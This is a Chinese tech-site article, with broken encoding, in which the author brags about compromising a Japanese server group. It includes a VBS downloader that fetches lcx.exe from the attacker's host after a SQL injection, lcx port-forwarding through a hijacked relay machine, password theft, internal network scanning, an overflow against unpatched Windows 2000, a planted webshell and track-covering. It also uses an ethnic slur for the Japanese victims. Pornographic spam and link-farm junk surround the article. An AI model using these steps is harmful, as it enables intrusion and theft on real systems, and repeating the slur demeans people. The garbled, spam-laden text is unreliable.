成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

實(shí)戰(zhàn)滲透日本服務(wù)器群

安全 網(wǎng)站安全
因?yàn)檫@一局,滲透獲取整個(gè)服務(wù)器群的權(quán)限,N臺(tái)服務(wù)器。所以寫(xiě)篇文章小小虛榮下

因?yàn)檫@一局,滲透獲取整個(gè)服務(wù)器群的權(quán)限,N臺(tái)服務(wù)器。所以寫(xiě)篇文章小小虛榮下。

開(kāi)局:

入手點(diǎn)是一個(gè)注射點(diǎn):sa,內(nèi)網(wǎng), 輕車熟路寫(xiě)個(gè)vbs腳本,下好lcx,轉(zhuǎn)發(fā)端口。


 

以下是引用片段:
down.vbs
iLocal LCase(WScript.Arguments(1))
iRemote LCase(WScript.Arguments(0))
Set xPost CreateObject("Microsoft.XMLHTTP")
xPost.Open "GET",iRemote,0
xPost
.Send()
Set sGet CreateObject("ADODB.Stream")
sGet.Mode 3
sGet
.Type 1
sGet
.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile iLocal,2

use: cscript down.vbs http://ip/lcx.exe lcx.exe               (路徑默認(rèn)在system32下)


這個(gè)下載腳本可以重復(fù)使用,也不會(huì)暴露我存放工具的地址。(有些下載腳本把下載地址寫(xiě)在里面,個(gè)人覺(jué)得不很好。)
由于本機(jī)連接日本網(wǎng)絡(luò)比較慢。連撥兩個(gè)VPN,再登上日本本土的一臺(tái)肉雞(我想這樣速度不會(huì)差了,ps:肉雞的作用體現(xiàn)出來(lái)了)。

加了用戶。在肉雞終端:lcx -listen 520 1982,目標(biāo)機(jī):lcx -slave myip 520 127.0.0.1 3389
ok,終端里填:127.0.0.1:1982 順利登陸。

中盤(pán):

win2000系統(tǒng),mssql server
先抓個(gè)系統(tǒng)密碼,找下sql密碼。查看了下一些信息,并檢查是否還有同行的后門(mén),清除之。
分析了下密碼:(數(shù)字+機(jī)器名+數(shù)字)
其他都是鳥(niǎo)語(yǔ)也看不太明白。載了幾個(gè)基本工具放個(gè)隱藏目錄。
ps:一般進(jìn)去后總得收拾下,最好不要種馬。死得快,也易暴露。

這時(shí)候就盤(pán)算著怎么拿web的權(quán)限了。(分析網(wǎng)絡(luò)拓?fù)浣Y(jié)構(gòu)了)
先看下網(wǎng)上鄰居:
workgroup
C**SQL2006
B**-DB
B***TENDB
....
很明顯,都是數(shù)據(jù)庫(kù)服務(wù)器。
再往上一層,又發(fā)現(xiàn)一個(gè)工作組:
web-k.**.jp
c***oo_db
...
哎,還是數(shù)據(jù)庫(kù)服務(wù)器。
ipconfig /all
192.168.10.18 只有一個(gè)內(nèi)網(wǎng)ip
ok:s tcp 192.168.10.1 192.168.10.254 80 20 /save
用s掃下內(nèi)網(wǎng)開(kāi)80的機(jī)子,線程設(shè)置為20,講究精確度嘛。
很遺憾,結(jié)果出來(lái)的幾個(gè)機(jī)子都是數(shù)據(jù)庫(kù)服務(wù)器,上面并沒(méi)有網(wǎng)站。
我就納悶了,web服務(wù)器跑哪了呢?

收官:

翻了一陣子,仔細(xì)分析了網(wǎng)絡(luò)拓?fù)浣Y(jié)構(gòu)。最后讓我找到了:
192.168.1.1-255這段是web服務(wù)器群
接下來(lái),用s果然掃出一片。再對(duì)應(yīng)外網(wǎng)ip,挑選溢出的下手對(duì)象(192.168.1.19)(倭奴喜歡古董級(jí)的win2000,好多補(bǔ)丁都不全,好溢出)
很舒坦地日下來(lái),然后載個(gè)webshell放到web目錄的偏僻角落。擦擦屁股走人。

ps:圖是我溢出另外一臺(tái)數(shù)據(jù)庫(kù)服務(wù)器時(shí)截下的


【編輯推薦】

  1. 中科紅旗Linux和日本NEC服務(wù)器密切合作
  2. 刀片服務(wù)器承載IPTV未來(lái)
責(zé)任編輯:Oo小孩兒 來(lái)源: CSDN
相關(guān)推薦

2010-09-06 17:08:23

2009-12-04 16:36:13

迷你服務(wù)器

2009-10-21 14:39:27

HP服務(wù)器故障排除

2010-02-22 11:13:39

2014-01-07 16:33:54

Fujitsu

2010-09-14 15:33:58

2011-05-25 10:52:45

2009-04-23 18:17:31

LinuxFTP服務(wù)器

2010-04-16 13:32:28

Win2008 R2

2020-10-16 16:40:26

Linux高并發(fā)命令

2012-02-14 14:20:49

虛擬化桌面虛擬化SRM

2010-04-14 17:37:49

RemoteApp

2021-07-13 10:35:00

LinuxNFS服務(wù)器

2009-06-27 20:20:00

LinuxNFS故障

2011-04-06 13:35:57

IBM服務(wù)器日本地震

2010-12-22 21:24:01

2013-08-26 09:53:54

2014-03-26 15:17:46

2010-10-15 08:57:15

PHP多進(jìn)程

2009-06-27 20:10:00

LinuxNFS原理
點(diǎn)贊
收藏

51CTO技術(shù)棧公眾號(hào)

主站蜘蛛池模板: 在线国产欧美 | 欧美精品一区二区三区蜜桃视频 | 99热在这里只有精品 | 国产无套一区二区三区久久 | 亚洲精品国产电影 | 色伊人| 欧美一区二区激情三区 | 91人人视频在线观看 | 日韩精品二区 | 国产一区二区三区色淫影院 | 欧美 日韩 国产 成人 在线 91 | 国产精品一区三区 | 亚洲一区电影 | 国产精品视频一区二区三区四区国 | 亚洲一区 中文字幕 | 久久久久久看片 | 国产一区在线视频 | 国产黄色在线观看 | 日韩精品1区2区3区 成人黄页在线观看 | 日韩中出 | 色综合九九 | 日本午夜精品 | 精品国产一区二区在线 | 欧美99久久精品乱码影视 | 亚洲美乳中文字幕 | 狠狠操狠狠干 | 美女操网站| 亚洲精品一区二区 | 亚洲网站在线观看 | 国产美女一区二区三区 | 日韩欧美一区二区在线播放 | 成人黄色a | 国产精品精品久久久 | 黄色永久免费 | 围产精品久久久久久久 | www.久久久久久久久 | 中文二区 | 国产成人免费视频 | 欧美日韩黄色一级片 | 在线欧美视频 | 日韩中文一区 |